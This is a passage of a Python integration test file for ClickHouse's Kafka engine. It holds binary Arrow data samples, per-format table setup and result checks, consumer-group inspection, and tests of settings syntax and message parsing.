x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\
x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
],
},
'ArrowStream' : {
'data_sample' : [
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\
x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
],
},
}
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Set up {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name,
extra_settings=format_opts.get('extra_settings') or ''))
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*format_tests_', repetitions=len(all_formats.keys()), look_behind_lines=12000)
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Checking {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
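# The Avro 'data_sample' entries above are built by the avro_message() helper
# defined earlier in this file. Purely as an illustration of the remark in the
# 'Avro' entry (records end up as consecutive blocks of one container, so they
# have to travel as a single message), a minimal sketch of such a helper might
# look like the function below. It assumes the standard `avro` package
# (DataFileWriter / DatumWriter) and a pre-built schema object; the name
# avro_container_sketch is hypothetical and the tests never call it.
def avro_container_sketch(schema, records):
    import io
    import avro.datafile
    import avro.io
    buf = io.BytesIO()
    writer = avro.datafile.DataFileWriter(buf, avro.io.DatumWriter(), schema)
    for record in records:
        # every appended record becomes part of the same Avro container
        writer.append(record)
    writer.flush()
    raw = buf.getvalue()  # one binary payload holding all records
    writer.close()
    return raw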
# Since receiving messages from Kafka is asynchronous and flaky,
# we may need to check the results several times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
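# The flakiness mentioned above is handled in the tests by a plain polling loop
# (accumulate query output, re-check against the reference, repeat). A small
# helper capturing that pattern could look like the sketch below; the name
# kafka_poll_until_match is hypothetical, and the tests inline the loop themselves.
def kafka_poll_until_match(query, ref_file='test_kafka_json.reference', timeout=180):
    deadline = time.monotonic() + timeout
    result = ''
    while time.monotonic() < deadline:
        # keep accumulating rows until the whole reference file is matched
        result += instance.query(query, ignore_error=True)
        if kafka_check_result(result, False, ref_file):
            return result
        time.sleep(0.5)
    raise TimeoutError('no matching result for {!r} within {}s'.format(query, timeout))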
# https://stackoverflow.com/a/57692111/1555175
def describe_consumer_group(kafka_cluster, name):
client = BrokerConnection('localhost', kafka_cluster.kafka_port, socket.AF_INET)
client.connect_blocking()
list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
future = client.send(list_members_in_groups)
while not future.is_done:
for resp, f in client.recv():
f.success(resp)
(error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]
res = []
for member in members:
(member_id, client_id, client_host, member_metadata, member_assignment) = member
member_info = {}
member_info['member_id'] = member_id
member_info['client_id'] = client_id
member_info['client_host'] = client_host
member_topics_assignment = []
for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
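# Example of how the helper above is used further down: after consuming from a
# topic, the tests look up the consumer group and check the client id that
# ClickHouse registered with the broker, e.g.
#
#     members = describe_consumer_group(kafka_cluster, 'old')
#     assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
#
# Each returned entry also carries 'member_id', 'client_host' and the decoded
# per-topic partition 'assignment'.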
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
# logging.debug("kafka is available - running test")
yield # run test
# Tests
@pytest.mark.timeout(180)
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages, since the old settings syntax
# doesn't support skipping broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:{} --describe --members --group old --verbose".format(cluster.kafka_port)))
@pytest.mark.timeout(180)
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
# Insert a couple of malformed messages.
kafka_produce(kafka_cluster, 'new', ['}{very_broken_message,'])
kafka_produce(kafka_cluster, 'new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'new')
assert members[0]['client_id'] == 'instance test 1234'
@pytest.mark.timeout(180)
def test_kafka_issue11308(kafka_cluster):
# Check that the materialized view respects Kafka SETTINGS
kafka_produce(kafka_cluster, 'issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }',
'{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
time.sleep(1)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_issue4116(kafka_cluster):
# Check that the format_csv_delimiter parameter now works, as part of all available format settings.
kafka_produce(kafka_cluster, 'issue4116', ['1|foo', '2|bar', '42|answer', '100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
